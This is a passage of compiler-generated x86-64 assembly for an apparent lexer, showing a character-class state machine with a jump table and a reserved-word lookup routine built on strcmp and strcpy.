cmpl $0, %eax je LBB1_133 ## %bb.132: leaq L_.str.2(%rip), %rdi leaq L_.str.16(%rip), %rsi movsbl -1(%rbp), %edx callq _action movl $19, _State(%rip) jmp LBB1_257 LBB1_133: leaq _strx12(%rip), %rsi movsbl -1(%rbp), %edi callq _in_string cmpl $0, %eax je LBB1_136 ## %bb.134: leaq _strx13(%rip), %rsi movsbl -2(%rbp), %edi callq _in_string cmpl $0, %eax je LBB1_136 ## %bb.135: leaq L_.str(%rip), %rdi leaq L_.str.1(%rip), %rsi movsbl -1(%rbp), %edx callq _action movl $1, _State(%rip) jmp LBB1_257 LBB1_136: leaq _strx12(%rip), %rsi movsbl -1(%rbp), %edi callq _in_string cmpl $0, %eax je LBB1_139 ## %bb.137: leaq _strx1(%rip), %rsi movsbl -2(%rbp), %edi callq _in_string cmpl $0, %eax je LBB1_139 ## %bb.138: leaq L_.str.2(%rip), %rdi leaq L_.str.17(%rip), %rsi movsbl -1(%rbp), %edx callq _action movl $19, _State(%rip) jmp LBB1_257 LBB1_139: leaq _strx19(%rip), %rsi movsbl -1(%rbp), %edi callq _in_string cmpl $0, %eax je LBB1_142 ## %bb.140: leaq _strx20(%rip), %rsi movsbl -2(%rbp), %edi callq _in_string cmpl $0, %eax je LBB1_142 ## %bb.141: leaq L_.str(%rip), %rdi leaq L_.str.1(%rip), %rsi movsbl -1(%rbp), %edx callq _action movl $10, _State(%rip) jmp LBB1_257 LBB1_142: leaq _strx22(%rip), %rsi movsbl -1(%rbp), %edi callq _in_string cmpl $0, %eax je LBB1_145 ## %bb.143: leaq _strx23(%rip), %rsi movsbl -2(%rbp), %edi callq _in_string cmpl $0, %eax je LBB1_145 ## %bb.144: leaq L_.str(%rip), %rdi leaq L_.str.1(%rip), %rsi movsbl -1(%rbp), %edx callq _action movl $6, _State(%rip) jmp LBB1_257 LBB1_145: leaq _strx2(%rip), %rsi movsbl -1(%rbp), %edi callq _in_string cmpl $0, %eax je LBB1_148 ## %bb.146: leaq _strx22(%rip), %rsi movsbl -2(%rbp), %edi callq _in_string cmpl $0, %eax je LBB1_148 ## %bb.147: leaq L_.str(%rip), %rdi leaq L_.str.1(%rip), %rsi movsbl -1(%rbp), %edx callq _action movl $21, _State(%rip) jmp LBB1_257 LBB1_148: leaq _strx24(%rip), %rsi movsbl -1(%rbp), %edi callq _in_string cmpl $0, %eax je LBB1_151 ## %bb.149: leaq _strx22(%rip), %rsi movsbl -2(%rbp), %edi callq _in_string cmpl $0, %eax je LBB1_151 ## %bb.150: leaq L_.str(%rip), %rdi leaq L_.str.1(%rip), %rsi movsbl -1(%rbp), %edx callq _action movl $21, _State(%rip) jmp LBB1_257 LBB1_151: leaq _strx23(%rip), %rsi movsbl -1(%rbp), %edi callq _in_string cmpl $0, %eax je LBB1_154 ## %bb.152: leaq _strx23(%rip), %rsi movsbl -2(%rbp), %edi callq _in_string cmpl $0, %eax je LBB1_154 ## %bb.153: leaq L_.str(%rip), %rdi leaq L_.str.1(%rip), %rsi movsbl -1(%rbp), %edx callq _action movl $12, _State(%rip) jmp LBB1_257 LBB1_154: leaq _strx25(%rip), %rsi movsbl -1(%rbp), %edi callq _in_string cmpl $0, %eax je LBB1_157 ## %bb.155: leaq _strx23(%rip), %rsi movsbl -2(%rbp), %edi callq _in_string cmpl $0, %eax je LBB1_157 ## %bb.156: leaq L_.str(%rip), %rdi leaq L_.str.1(%rip), %rsi movsbl -1(%rbp), %edx callq _action movl $20, _State(%rip) jmp LBB1_257 LBB1_157: leaq _strx20(%rip), %rsi movsbl -1(%rbp), %edi callq _in_string cmpl $0, %eax je LBB1_160 ## %bb.158: leaq _strx20(%rip), %rsi movsbl -2(%rbp), %edi callq _in_string cmpl $0, %eax je LBB1_160 ## %bb.159: leaq L_.str(%rip), %rdi leaq L_.str.1(%rip), %rsi movsbl -1(%rbp), %edx callq _action movl $23, _State(%rip) jmp LBB1_257 LBB1_160: leaq _strx26(%rip), %rsi movsbl -1(%rbp), %edi callq _in_string cmpl $0, %eax je LBB1_163 ## %bb.161: leaq _strx27(%rip), %rsi movsbl -2(%rbp), %edi callq _in_string cmpl $0, %eax je LBB1_163 ## %bb.162: leaq L_.str(%rip), %rdi leaq L_.str.1(%rip), %rsi movsbl -1(%rbp), %edx callq _action movl $9, _State(%rip) jmp LBB1_257 LBB1_163: leaq _strx26(%rip), %rsi movsbl -1(%rbp), %edi callq _in_string cmpl $0, %eax je LBB1_166 ## %bb.164: leaq _strx1(%rip), %rsi movsbl -2(%rbp), %edi callq _in_string cmpl $0, %eax je LBB1_166 ## %bb.165: leaq L_.str.2(%rip), %rdi leaq L_.str.6(%rip), %rsi movsbl -1(%rbp), %edx callq _action movl $19, _State(%rip) jmp LBB1_257 LBB1_166: leaq _strx4(%rip), %rsi movsbl -1(%rbp), %edi callq _in_string cmpl $0, %eax je LBB1_169 ## %bb.167: leaq _strx1(%rip), %rsi movsbl -2(%rbp), %edi callq _in_string cmpl $0, %eax je LBB1_169 ## %bb.168: leaq L_.str(%rip), %rdi leaq L_.str.1(%rip), %rsi movsbl -1(%rbp), %edx callq _action movl $26, _State(%rip) jmp LBB1_257 LBB1_169: leaq _strx29(%rip), %rsi movsbl -1(%rbp), %edi callq _in_string cmpl $0, %eax je LBB1_172 ## %bb.170: leaq _strx1(%rip), %rsi movsbl -2(%rbp), %edi callq _in_string cmpl $0, %eax je LBB1_172 ## %bb.171: leaq L_.str.2(%rip), %rdi leaq L_.str.18(%rip), %rsi movsbl -1(%rbp), %edx callq _action movl $19, _State(%rip) jmp LBB1_257 LBB1_172: leaq _strx30(%rip), %rsi movsbl -1(%rbp), %edi callq _in_string cmpl $0, %eax je LBB1_175 ## %bb.173: leaq _strx1(%rip), %rsi movsbl -2(%rbp), %edi callq _in_string cmpl $0, %eax je LBB1_175 ## %bb.174: leaq L_.str(%rip), %rdi leaq L_.str.19(%rip), %rsi movsbl -1(%rbp), %edx callq _action movl $19, _State(%rip) jmp LBB1_257 LBB1_175: jmp LBB1_256 LBB1_176: leaq _strx23(%rip), %rsi movsbl -1(%rbp), %edi callq _in_string cmpl $0, %eax je LBB1_179 ## %bb.177: leaq _strx1(%rip), %rsi movsbl -2(%rbp), %edi callq _in_string cmpl $0, %eax je LBB1_179 ## %bb.178: leaq L_.str.2(%rip), %rdi leaq L_.str.6(%rip), %rsi movsbl -1(%rbp), %edx callq _action movl $19, _State(%rip) jmp LBB1_257 LBB1_179: jmp LBB1_256 LBB1_180: leaq _strx22(%rip), %rsi movsbl -1(%rbp), %edi callq _in_string cmpl $0, %eax je LBB1_183 ## %bb.181: leaq _strx1(%rip), %rsi movsbl -2(%rbp), %edi callq _in_string cmpl $0, %eax je LBB1_183 ## %bb.182: leaq L_.str.2(%rip), %rdi leaq L_.str.6(%rip), %rsi movsbl -1(%rbp), %edx callq _action movl $19, _State(%rip) jmp LBB1_257 LBB1_183: jmp LBB1_256 LBB1_184: leaq _strx10(%rip), %rsi movsbl -1(%rbp), %edi callq _in_string cmpl $0, %eax je LBB1_187 ## %bb.185: leaq _strx10(%rip), %rsi movsbl -2(%rbp), %edi callq _in_string cmpl $0, %eax je LBB1_187 ## %bb.186: leaq L_.str(%rip), %rdi leaq L_.str.1(%rip), %rsi movsbl -1(%rbp), %edx callq _action movl $22, _State(%rip) jmp LBB1_257 LBB1_187: leaq _strx10(%rip), %rsi movsbl -1(%rbp), %edi callq _in_string cmpl $0, %eax je LBB1_190 ## %bb.188: leaq _strx14(%rip), %rsi movsbl -2(%rbp), %edi callq _in_string cmpl $0, %eax je LBB1_190 ## %bb.189: leaq L_.str(%rip), %rdi leaq L_.str.1(%rip), %rsi movsbl -1(%rbp), %edx callq _action movl $4, _State(%rip) jmp LBB1_257 LBB1_190: leaq _strx10(%rip), %rsi movsbl -1(%rbp), %edi callq _in_string cmpl $0, %eax je LBB1_193 ## %bb.191: leaq _strx11(%rip), %rsi movsbl -2(%rbp), %edi callq _in_string cmpl $0, %eax je LBB1_193 ## %bb.192: leaq L_.str(%rip), %rdi leaq L_.str.1(%rip), %rsi movsbl -1(%rbp), %edx callq _action movl $15, _State(%rip) jmp LBB1_257 LBB1_193: leaq _strx10(%rip), %rsi movsbl -1(%rbp), %edi callq _in_string cmpl $0, %eax je LBB1_196 ## %bb.194: leaq _strx1(%rip), %rsi movsbl -2(%rbp), %edi callq _in_string cmpl $0, %eax je LBB1_196 ## %bb.195: leaq L_.str.2(%rip), %rdi leaq L_.str.16(%rip), %rsi movsbl -1(%rbp), %edx callq _action movl $19, _State(%rip) jmp LBB1_257 LBB1_196: jmp LBB1_256 LBB1_197: leaq _strx20(%rip), %rsi movsbl -1(%rbp), %edi callq _in_string cmpl $0, %eax je LBB1_200 ## %bb.198: leaq _strx1(%rip), %rsi movsbl -2(%rbp), %edi callq _in_string cmpl $0, %eax je LBB1_200 ## %bb.199: leaq L_.str.2(%rip), %rdi leaq L_.str.20(%rip), %rsi movsbl -1(%rbp), %edx callq _action movl $19, _State(%rip) jmp LBB1_257 LBB1_200: jmp LBB1_256 LBB1_201: leaq _strx20(%rip), %rsi movsbl -1(%rbp), %edi callq _in_string cmpl $0, %eax je LBB1_204 ## %bb.202: leaq _strx21(%rip), %rsi movsbl -2(%rbp), %edi callq _in_string cmpl $0, %eax je LBB1_204 ## %bb.203: leaq L_.str(%rip), %rdi leaq L_.str.1(%rip), %rsi movsbl -1(%rbp), %edx callq _action movl $25, _State(%rip) jmp LBB1_257 LBB1_204: jmp LBB1_256 LBB1_205: leaq _strx21(%rip), %rsi movsbl -1(%rbp), %edi callq _in_string cmpl $0, %eax je LBB1_208 ## %bb.206: leaq _strx1(%rip), %rsi movsbl -2(%rbp), %edi callq _in_string cmpl $0, %eax je LBB1_208 ## %bb.207: leaq L_.str.2(%rip), %rdi leaq L_.str.21(%rip), %rsi movsbl -1(%rbp), %edx callq _action movl $19, _State(%rip) jmp LBB1_257 LBB1_208: jmp LBB1_256 LBB1_209: leaq _strx4(%rip), %rsi movsbl -1(%rbp), %edi callq _in_string cmpl $0, %eax je LBB1_212 ## %bb.210: leaq _strx1(%rip), %rsi movsbl -2(%rbp), %edi callq _in_string cmpl $0, %eax je LBB1_212 ## %bb.211: leaq L_.str.2(%rip), %rdi leaq L_.str.22(%rip), %rsi movsbl -1(%rbp), %edx callq _action movl $19, _State(%rip) jmp LBB1_257 LBB1_212: leaq _strx28(%rip), %rsi movsbl -1(%rbp), %edi callq _in_string cmpl $0, %eax je LBB1_215 ## %bb.213: leaq _strx1(%rip), %rsi movsbl -2(%rbp), %edi callq _in_string cmpl $0, %eax je LBB1_215 ## %bb.214: leaq L_.str(%rip), %rdi leaq L_.str.1(%rip), %rsi movsbl -1(%rbp), %edx callq _action movl $26, _State(%rip) jmp LBB1_257 LBB1_215: jmp LBB1_256 LBB1_216: leaq _strx9(%rip), %rsi movsbl -1(%rbp), %edi callq _in_string cmpl $0, %eax je LBB1_219 ## %bb.217: leaq _strx9(%rip), %rsi movsbl -2(%rbp), %edi callq _in_string cmpl $0, %eax je LBB1_219 ## %bb.218: leaq L_.str(%rip), %rdi leaq L_.str.1(%rip), %rsi movsbl -1(%rbp), %edx callq _action movl $27, _State(%rip) jmp LBB1_257 LBB1_219: leaq _strx8(%rip), %rsi movsbl -1(%rbp), %edi callq _in_string cmpl $0, %eax je LBB1_222 ## %bb.220: leaq _strx1(%rip), %rsi movsbl -2(%rbp), %edi callq _in_string cmpl $0, %eax je LBB1_222 ## %bb.221: leaq L_.str.2(%rip), %rdi leaq L_.str.15(%rip), %rsi movsbl -1(%rbp), %edx callq _action movl $19, _State(%rip) jmp LBB1_257 LBB1_222: jmp LBB1_256 LBB1_223: leaq _strx16(%rip), %rsi movsbl -1(%rbp), %edi callq _in_string cmpl $0, %eax je LBB1_226 ## %bb.224: leaq _strx15(%rip), %rsi movsbl -2(%rbp), %edi callq _in_string cmpl $0, %eax je LBB1_226 ## %bb.225: leaq L_.str(%rip), %rdi leaq L_.str.1(%rip), %rsi movsbl -1(%rbp), %edx callq _action movl $29, _State(%rip) jmp LBB1_257 LBB1_226: jmp LBB1_256 LBB1_227: leaq _strx15(%rip), %rsi movsbl -1(%rbp), %edi callq _in_string cmpl $0, %eax je LBB1_230 ## %bb.228: leaq _strx15(%rip), %rsi movsbl -2(%rbp), %edi callq _in_string cmpl $0, %eax je LBB1_230 ## %bb.229: leaq L_.str(%rip), %rdi leaq L_.str.1(%rip), %rsi movsbl -1(%rbp), %edx callq _action movl $29, _State(%rip) jmp LBB1_257 LBB1_230: leaq _strx15(%rip), %rsi movsbl -1(%rbp), %edi callq _in_string cmpl $0, %eax je LBB1_233 ## %bb.231: leaq _strx1(%rip), %rsi movsbl -2(%rbp), %edi callq _in_string cmpl $0, %eax je LBB1_233 ## %bb.232: leaq L_.str.2(%rip), %rdi leaq L_.str.23(%rip), %rsi movsbl -1(%rbp), %edx callq _action movl $19, _State(%rip) jmp LBB1_257 LBB1_233: jmp LBB1_256 LBB1_234: leaq _strx18(%rip), %rsi movsbl -1(%rbp), %edi callq _in_string cmpl $0, %eax je LBB1_237 ## %bb.235: leaq _strx10(%rip), %rsi movsbl -2(%rbp), %edi callq _in_string cmpl $0, %eax je LBB1_237 ## %bb.236: leaq L_.str(%rip), %rdi leaq L_.str.1(%rip), %rsi movsbl -1(%rbp), %edx callq _action movl $31, _State(%rip) jmp LBB1_257 LBB1_237: jmp LBB1_256 LBB1_238: leaq _strx10(%rip), %rsi movsbl -1(%rbp), %edi callq _in_string cmpl $0, %eax je LBB1_241 ## %bb.239: leaq _strx10(%rip), %rsi movsbl -2(%rbp), %edi callq _in_string cmpl $0, %eax je LBB1_241 ## %bb.240: leaq L_.str(%rip), %rdi leaq L_.str.1(%rip), %rsi movsbl -1(%rbp), %edx callq _action movl $31, _State(%rip) jmp LBB1_257 LBB1_241: leaq _strx10(%rip), %rsi movsbl -1(%rbp), %edi callq _in_string cmpl $0, %eax je LBB1_244 ## %bb.242: leaq _strx1(%rip), %rsi movsbl -2(%rbp), %edi callq _in_string cmpl $0, %eax je LBB1_244 ## %bb.243: leaq L_.str.2(%rip), %rdi leaq L_.str.24(%rip), %rsi movsbl -1(%rbp), %edx callq _action movl $19, _State(%rip) jmp LBB1_257 LBB1_244: jmp LBB1_256 LBB1_245: leaq _strx17(%rip), %rsi movsbl -1(%rbp), %edi callq _in_string cmpl $0, %eax je LBB1_248 ## %bb.246: leaq _strx5(%rip), %rsi movsbl -2(%rbp), %edi callq _in_string cmpl $0, %eax je LBB1_248 ## %bb.247: leaq L_.str(%rip), %rdi leaq L_.str.1(%rip), %rsi movsbl -1(%rbp), %edx callq _action movl $33, _State(%rip) jmp LBB1_257 LBB1_248: jmp LBB1_256 LBB1_249: leaq _strx5(%rip), %rsi movsbl -1(%rbp), %edi callq _in_string cmpl $0, %eax je LBB1_252 ## %bb.250: leaq _strx5(%rip), %rsi movsbl -2(%rbp), %edi callq _in_string cmpl $0, %eax je LBB1_252 ## %bb.251: leaq L_.str(%rip), %rdi leaq L_.str.1(%rip), %rsi movsbl -1(%rbp), %edx callq _action movl $33, _State(%rip) jmp LBB1_257 LBB1_252: leaq _strx5(%rip), %rsi movsbl -1(%rbp), %edi callq _in_string cmpl $0, %eax je LBB1_255 ## %bb.253: leaq _strx1(%rip), %rsi movsbl -2(%rbp), %edi callq _in_string cmpl $0, %eax je LBB1_255 ## %bb.254: leaq L_.str.2(%rip), %rdi leaq L_.str.25(%rip), %rsi movsbl -1(%rbp), %edx callq _action movl $19, _State(%rip) jmp LBB1_257 LBB1_255: jmp LBB1_256 LBB1_256: movsbl -1(%rbp), %esi movsbl -1(%rbp), %edx movsbl -2(%rbp), %ecx movsbl -2(%rbp), %r8d movl _State(%rip), %r9d leaq L_.str.26(%rip), %rdi movb $0, %al callq _printf LBB1_257: addq $16, %rsp popq %rbp retq .cfi_endproc .p2align 2, 0x90 .data_region jt32 .set L1_0_set_1, LBB1_1-LJTI1_0 .set L1_0_set_8, LBB1_8-LJTI1_0 .set L1_0_set_15, LBB1_15-LJTI1_0 .set L1_0_set_19, LBB1_19-LJTI1_0 .set L1_0_set_23, LBB1_23-LJTI1_0 .set L1_0_set_30, LBB1_30-LJTI1_0 .set L1_0_set_34, LBB1_34-LJTI1_0 .set L1_0_set_41, LBB1_41-LJTI1_0 .set L1_0_set_48, LBB1_48-LJTI1_0 .set L1_0_set_52, LBB1_52-LJTI1_0 .set L1_0_set_59, LBB1_59-LJTI1_0 .set L1_0_set_63, LBB1_63-LJTI1_0 .set L1_0_set_70, LBB1_70-LJTI1_0 .set L1_0_set_74, LBB1_74-LJTI1_0 .set L1_0_set_81, LBB1_81-LJTI1_0 .set L1_0_set_85, LBB1_85-LJTI1_0 .set L1_0_set_89, LBB1_89-LJTI1_0 .set L1_0_set_102, LBB1_102-LJTI1_0 .set L1_0_set_106, LBB1_106-LJTI1_0 .set L1_0_set_176, LBB1_176-LJTI1_0 .set L1_0_set_180, LBB1_180-LJTI1_0 .set L1_0_set_184, LBB1_184-LJTI1_0 .set L1_0_set_197, LBB1_197-LJTI1_0 .set L1_0_set_201, LBB1_201-LJTI1_0 .set L1_0_set_205, LBB1_205-LJTI1_0 .set L1_0_set_209, LBB1_209-LJTI1_0 .set L1_0_set_216, LBB1_216-LJTI1_0 .set L1_0_set_223, LBB1_223-LJTI1_0 .set L1_0_set_227, LBB1_227-LJTI1_0 .set L1_0_set_234, LBB1_234-LJTI1_0 .set L1_0_set_238, LBB1_238-LJTI1_0 .set L1_0_set_245, LBB1_245-LJTI1_0 .set L1_0_set_249, LBB1_249-LJTI1_0 LJTI1_0: .long L1_0_set_1 .long L1_0_set_8 .long L1_0_set_15 .long L1_0_set_19 .long L1_0_set_23 .long L1_0_set_30 .long L1_0_set_34 .long L1_0_set_41 .long L1_0_set_48 .long L1_0_set_52 .long L1_0_set_59 .long L1_0_set_63 .long L1_0_set_70 .long L1_0_set_74 .long L1_0_set_81 .long L1_0_set_85 .long L1_0_set_89 .long L1_0_set_102 .long L1_0_set_106 .long L1_0_set_176 .long L1_0_set_180 .long L1_0_set_184 .long L1_0_set_197 .long L1_0_set_201 .long L1_0_set_205 .long L1_0_set_209 .long L1_0_set_216 .long L1_0_set_223 .long L1_0_set_227 .long L1_0_set_234 .long L1_0_set_238 .long L1_0_set_245 .long L1_0_set_249 .end_data_region ## -- End function .globl _reserved_words ## -- Begin function reserved_words .p2align 4, 0x90 _reserved_words: ## @reserved_words .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $16, %rsp movq %rdi, -8(%rbp) movq %rsi, -16(%rbp) movq -8(%rbp), %rdi leaq L_.str.27(%rip), %rsi callq _strcmp cmpl $0, %eax jne LBB2_2 ## %bb.1: movq -16(%rbp), %rdi leaq L_.str.27(%rip), %rsi movq $-1, %rdx callq ___strcpy_chk jmp LBB2_202 LBB2_2: movq -8(%rbp), %rdi leaq L_.str.28(%rip), %rsi callq _strcmp cmpl $0, %eax jne LBB2_4 ## %bb.3: movq -16(%rbp), %rdi leaq L_.str.28(%rip), %rsi movq $-1, %rdx callq ___strcpy_chk jmp LBB2_202 LBB2_4: movq -8(%rbp), %rdi leaq L_.str.29(%rip), %rsi callq _strcmp cmpl $0, %eax jne LBB2_6 ## %bb.5: movq -16(%rbp), %rdi leaq L_.str.29(%rip), %rsi movq $-1, %rdx callq ___strcpy_chk jmp LBB2_202 LBB2_6: movq -8(%rbp), %rdi leaq L_.str.30(%rip), %rsi callq _strcmp cmpl $0, %eax jne LBB2_8 ## %bb.7: movq -16(%rbp), %rdi leaq L_.str.30(%rip), %rsi movq $-1, %rdx callq ___strcpy_chk jmp LBB2_202 LBB2_8: movq -8(%rbp), %rdi leaq L_.str.31(%rip), %rsi callq _strcmp cmpl $0, %eax jne LBB2_10 ## %bb.9: movq -16(%rbp), %rdi leaq L_.str.31(%rip), %rsi movq $-1, %rdx callq ___strcpy_chk jmp LBB2_202 LBB2_10: movq -8(%rbp), %rdi leaq L_.str.32(%rip), %rsi callq _strcmp cmpl $0, %eax jne LBB2_12 ## %bb.11: movq -16(%rbp), %rdi leaq L_.str.32(%rip), %rsi movq $-1, %rdx callq ___strcpy_chk jmp LBB2_202 LBB2_12: movq -8(%rbp), %rdi leaq L_.str.33(%rip), %rsi callq _strcmp cmpl $0, %eax jne LBB2_14 ## %bb.13: movq -16(%rbp), %rdi leaq L_.str.33(%rip), %rsi movq $-1, %rdx callq ___strcpy_chk jmp LBB2_202 LBB2_14: movq -8(%rbp), %rdi leaq L_.str.34(%rip), %rsi callq _strcmp cmpl $0, %eax jne LBB2_16 ## %bb.15: movq -16(%rbp), %rdi leaq L_.str.34(%rip), %rsi movq $-1, %rdx callq ___strcpy_chk jmp LBB2_202 LBB2_16: movq -8(%rbp), %rdi leaq L_.str.35(%rip), %rsi callq _strcmp cmpl $0, %eax jne LBB2_18 ## %bb.17: movq -16(%rbp), %rdi leaq L_.str.35(%rip), %rsi movq $-1, %rdx callq ___strcpy_chk jmp LBB2_202 LBB2_18: movq -8(%rbp), %rdi leaq L_.str.36(%rip), %rsi callq _strcmp cmpl $0, %eax jne LBB2_20 ## %bb.19: movq -16(%rbp), %rdi leaq L_.str.36(%rip), %rsi movq $-1, %rdx callq ___strcpy_chk jmp LBB2_202 LBB2_20: movq -8(%rbp), %rdi leaq L_.str.37(%rip), %rsi callq _strcmp cmpl $0, %eax jne LBB2_22 ## %bb.21: movq -16(%rbp), %rdi leaq L_.str.37(%rip), %rsi movq $-1, %rdx callq ___strcpy_chk jmp LBB2_202 LBB2_22: movq -8(%rbp), %rdi leaq L_.str.38(%rip), %rsi callq _strcmp cmpl $0, %eax jne LBB2_24 ## %bb.23: movq -16(%rbp), %rdi leaq L_.str.38(%rip), %rsi movq $-1, %rdx callq ___strcpy_chk jmp LBB2_202 LBB2_24: movq -8(%rbp), %rdi leaq L_.str.39(%rip), %rsi callq _strcmp cmpl $0, %eax jne LBB2_26 ## %bb.25: movq -16(%rbp), %rdi leaq L_.str.39(%rip), %rsi movq $-1, %rdx callq ___strcpy_chk jmp LBB2_202 LBB2_26: movq -8(%rbp), %rdi leaq L_.str.40(%rip), %rsi callq _strcmp cmpl $0, %eax jne LBB2_28 ## %bb.27: movq -16(%rbp), %rdi leaq L_.str.40(%rip), %rsi movq $-1, %rdx callq ___strcpy_chk jmp LBB2_202 LBB2_28: movq -8(%rbp), %rdi leaq L_.str.41(%rip), %rsi callq _strcmp cmpl $0, %eax jne LBB2_30 ## %bb.29: movq -16(%rbp), %rdi leaq L_.str.41(%rip), %rsi movq $-1, %rdx callq ___strcpy_chk jmp LBB2_202 LBB2_30: movq -8(%rbp), %rdi leaq L_.str.42(%rip), %rsi callq _strcmp cmpl $0, %eax jne LBB2_32 ## %bb.31: movq -16(%rbp), %rdi leaq L_.str.42(%rip), %rsi movq $-1, %rdx callq ___strcpy_chk jmp LBB2_202 LBB2_32: movq -8(%rbp), %rdi leaq L_.str.43(%rip), %rsi callq _strcmp cmpl $0, %eax jne LBB2_34 ## %bb.33: movq -16(%rbp), %rdi leaq L_.str.43(%rip), %rsi movq $-1, %rdx callq ___strcpy_chk jmp LBB2_202 LBB2_34: movq -8(%rbp), %rdi leaq L_.str.44(%rip), %rsi callq _strcmp cmpl $0, %eax jne LBB2_36 ## %bb.35: movq -16(%rbp), %rdi leaq L_.str.44(%rip), %rsi movq $-1, %rdx callq ___strcpy_chk jmp LBB2_202 LBB2_36: movq -8(%rbp), %rdi leaq L_.str.45(%rip), %rsi callq _strcmp cmpl $0, %eax jne LBB2_38 ## %bb.37: movq -16(%rbp), %rdi leaq L_.str.45(%rip), %rsi movq $-1, %rdx callq ___strcpy_chk jmp LBB2_202 LBB2_38: movq -8(%rbp), %rdi leaq L_.str.46(%rip), %rsi callq _strcmp cmpl $0, %eax jne LBB2_40 ## %bb.39: movq -16(%rbp), %rdi leaq L_.str.46(%rip), %rsi movq $-1, %rdx callq ___strcpy_chk jmp LBB2_202 LBB2_40: movq -8(%rbp), %rdi leaq L_.str.47(%rip), %rsi callq _strcmp cmpl $0, %eax jne LBB2_42 ## %bb.41: movq -16(%rbp), %rdi leaq L_.str.47(%rip), %rsi movq $-1, %rdx callq ___strcpy_chk jmp LBB2_202 LBB2_42: movq -8(%rbp), %rdi leaq L_.str.48(%rip), %rsi callq _strcmp cmpl $0, %eax jne LBB2_44 ## %bb.43: movq -16(%rbp), %rdi leaq L_.str.48(%rip), %rsi movq $-1, %rdx callq ___strcpy_chk jmp LBB2_202 LBB2_44: movq -8(%rbp), %rdi leaq L_.str.49(%rip), %rsi callq _strcmp cmpl $0, %eax jne LBB2_46 ## %bb.45: movq -16(%rbp), %rdi leaq L_.str.49(%rip), %rsi movq $-1, %rdx callq ___strcpy_chk jmp LBB2_202 LBB2_46: movq -8(%rbp), %rdi leaq L_.str.50(%rip), %rsi callq _strcmp cmpl $0, %eax jne LBB2_48 ## %bb.47: movq -16(%rbp), %rdi leaq L_.str.50(%rip), %rsi movq $-1, %rdx callq ___strcpy_chk jmp LBB2_202 LBB2_48: movq -8(%rbp), %rdi leaq L_.str.51(%rip), %rsi callq _strcmp cmpl $0, %eax jne LBB2_50 ## %bb.49: movq -16(%rbp), %rdi leaq L_.str.51(%rip), %rsi movq $-1, %rdx callq ___strcpy_chk jmp LBB2_202 LBB2_50: movq -8(%rbp), %rdi leaq L_.str.52(%rip), %rsi callq _strcmp cmpl $0, %eax jne LBB2_52 ## %bb.51: movq -16(%rbp), %rdi leaq L_.str.52(%rip), %rsi movq $-1, %rdx callq ___strcpy_chk jmp LBB2_202 LBB2_52: movq -8(%rbp), %rdi leaq L_.str.53(%rip), %rsi callq _strcmp cmpl $0, %eax jne LBB2_54 ## %bb.53: movq -16(%rbp), %rdi leaq L_.str.53(%rip), %rsi movq $-1, %rdx callq ___strcpy_chk jmp LBB2_202 LBB2_54: movq -8(%rbp), %rdi leaq L_.str.54(%rip), %rsi callq _strcmp cmpl $0, %eax jne LBB2_56 ## %bb.55: movq -16(%rbp), %rdi leaq L_.str.54(%rip), %rsi movq $-1, %rdx callq ___strcpy_chk jmp LBB2_202 LBB2_56: movq -8(%rbp), %rdi leaq L_.str.55(%rip), %rsi callq _strcmp cmpl $0, %eax jne LBB2_58 ## %bb.57: movq -16(%rbp), %rdi leaq L_.str.55(%rip), %rsi movq $-1, %rdx callq ___strcpy_chk jmp LBB2_202 LBB2_58: movq -8(%rbp), %rdi leaq L_.str.10(%rip), %rsi callq _strcmp cmpl $0, %eax jne LBB2_60 ## %bb.59: movq -16(%rbp), %rdi leaq L_.str.10(%rip), %rsi movq $-1, %rdx callq ___strcpy_chk jmp LBB2_202 LBB2_60: movq -8(%rbp), %rdi leaq L_.str.56(%rip), %rsi callq _strcmp cmpl $0, %eax jne LBB2_62 ## %bb.61: movq -16(%rbp), %rdi leaq L_.str.56(%rip), %rsi movq $-1, %rdx callq ___strcpy_chk jmp LBB2_202 LBB2_62: movq -8(%rbp), %rdi leaq L_.str.57(%rip), %rsi callq _strcmp cmpl $0, %eax jne LBB2_64 ## %bb.63: movq -16(%rbp), %rdi leaq L_.str.57(%rip), %rsi movq $-1, %rdx callq ___strcpy_chk jmp LBB2_202 LBB2_64: movq -8(%rbp), %rdi leaq L_.str.58(%rip), %rsi callq _strcmp cmpl $0, %eax jne LBB2_66 ## %bb.65: movq -16(%rbp), %rdi leaq L_.str.58(%rip), %rsi movq $-1, %rdx callq ___strcpy_chk jmp LBB2_202 LBB2_66: movq -8(%rbp), %rdi leaq L_.str.59(%rip), %rsi callq _strcmp cmpl $0, %eax jne LBB2_68 ## %bb.67: movq -16(%rbp), %rdi leaq L_.str.59(%rip), %rsi movq $-1, %rdx callq ___strcpy_chk jmp LBB2_202 LBB2_68: movq -8(%rbp), %rdi leaq L_.str.60(%rip), %rsi callq _strcmp cmpl $0, %eax jne LBB2_70 ## %bb.69: movq -16(%rbp), %rdi leaq L_.str.60(%rip), %rsi movq $-1, %rdx callq ___strcpy_chk jmp LBB2_202 LBB2_70: movq -8(%rbp), %rdi leaq L_.str.61(%rip), %rsi callq _strcmp cmpl $0, %eax jne LBB2_72 ## %bb.71: movq -16(%rbp), %rdi leaq L_.str.61(%rip), %rsi movq $-1, %rdx callq ___strcpy_chk jmp LBB2_202 LBB2_72: movq -8(%rbp), %rdi leaq L_.str.62(%rip), %rsi callq _strcmp cmpl $0, %eax jne LBB2_74 ## %bb.73: movq -16(%rbp), %rdi leaq L_.str.62(%rip), %rsi movq $-1, %rdx callq ___strcpy_chk jmp LBB2_202 LBB2_74: movq -8(%rbp), %rdi leaq L_.str.63(%rip), %rsi callq _strcmp cmpl $0, %eax jne LBB2_76 ## %bb.75: movq -16(%rbp), %rdi leaq L_.str.63(%rip), %rsi movq $-1, %rdx callq ___strcpy_chk jmp LBB2_202 LBB2_76: movq -8(%rbp), %rdi leaq L_.str.64(%rip), %rsi callq _strcmp cmpl $0, %eax jne LBB2_78 ## %bb.77: movq -16(%rbp), %rdi leaq L_.str.64(%rip), %rsi movq $-1, %rdx callq ___strcpy_chk jmp LBB2_202 LBB2_78: movq -8(%rbp), %rdi leaq L_.str.65(%rip), %rsi callq _strcmp cmpl $0, %eax jne LBB2_80 ## %bb.79: movq -16(%rbp), %rdi leaq L_.str.65(%rip), %rsi movq $-1, %rdx callq ___strcpy_chk jmp LBB2_202 LBB2_80: movq -8(%rbp), %rdi leaq L_.str.66(%rip), %rsi callq _strcmp cmpl $0, %eax jne LBB2_82 ## %bb.81: movq -16(%rbp), %rdi leaq L_.str.66(%rip), %rsi movq $-1, %rdx callq 